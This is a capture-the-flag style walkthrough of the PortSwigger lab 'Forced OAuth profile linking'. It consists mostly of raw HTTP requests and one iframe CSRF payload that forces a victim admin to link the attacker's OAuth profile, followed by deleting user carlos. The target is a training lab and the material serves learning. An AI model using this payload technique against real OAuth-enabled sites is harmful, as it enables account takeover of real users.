Skip to content

Port Swigger Forced OAuth profile linking

Forced OAuth profile linking

Solution

Login to website as user: wiener

POST /login HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=9k1xxXHp8RWJn0r9Q6GHl6bya9GglfMO
Content-Length: 68
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

csrf=ivZBjROT9XNMcdI64sYy05XOrzW4YETJ&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=TMh6GXv7KigXw0AybIysHivMeDs5HyDm
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Add "Login with social media"

GET /oauth-linking?code=0CA6BJXfL04eVUhT8yCCZjq7PvFIEVr9A1gYlRL7IUa HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=TMh6GXv7KigXw0AybIysHivMeDs5HyDm
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Referer: https://oauth-0a07007404f1e82a836268e80221007c.oauth-server.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Login via "Login with social media"

GET /my-account HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=TMh6GXv7KigXw0AybIysHivMeDs5HyDm
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/oauth-linking?code=0CA6BJXfL04eVUhT8yCCZjq7PvFIEVr9A1gYlRL7IUa
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Request second code

Sent / drop request and get active code: RV8vQ0rG7bArAQB1bAiAtvRoocPvv7u68P-hGYMj3p_ 
---
GET /oauth-login?code=RV8vQ0rG7bArAQB1bAiAtvRoocPvv7u68P-hGYMj3p_ HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=aG7xcWh3w22LtqLwK7rdCnPYeKsXHNkg
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Open "Exploit server" and create payload

Payload: <iframe src="https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/oauth-linking?code=fhTtIE8-iKtSEEtJa8-ZhzdYP2tNL0arZzEfrkgUcRw
"></iframe>

Click "store" --> "Deliver exploit to victim"

Delete user: carlos

GET /admin/delete?username=carlos HTTP/2
Host: 0a5200f404b3e88e83f26adf00200055.web-security-academy.net
Cookie: session=JPpvnTWXu4AOofHVQRbNwdT7VKGmTbBq
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5200f404b3e88e83f26adf00200055.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Solved